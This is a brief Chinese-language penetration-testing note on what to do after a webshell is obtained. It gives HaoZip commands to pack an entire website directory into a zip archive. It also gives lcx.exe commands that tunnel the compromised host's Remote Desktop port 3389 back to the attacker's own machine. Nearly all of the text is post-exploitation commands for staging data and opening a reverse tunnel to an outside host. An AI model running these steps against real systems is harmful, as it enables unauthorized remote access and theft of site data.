在某个渗透测试任务中,当拿到webshell后,我们关注到平台有haozip的压缩程式。需要打包站点时,可执行:
C:\Program Files\HaoZip\>haozipc a -tzip ***.zip C:\目录\*(压缩打包了整个目录及子目录)
LCX 反弹:
反弹时,在本机(A) 执行: lcx.exe -listen 51 3389
在webshell 机子(B)执行:lcx.exe -slave (A)IP 51 (B)IP 3389
在本机用远程连接程序连接 127.0.0.1 3389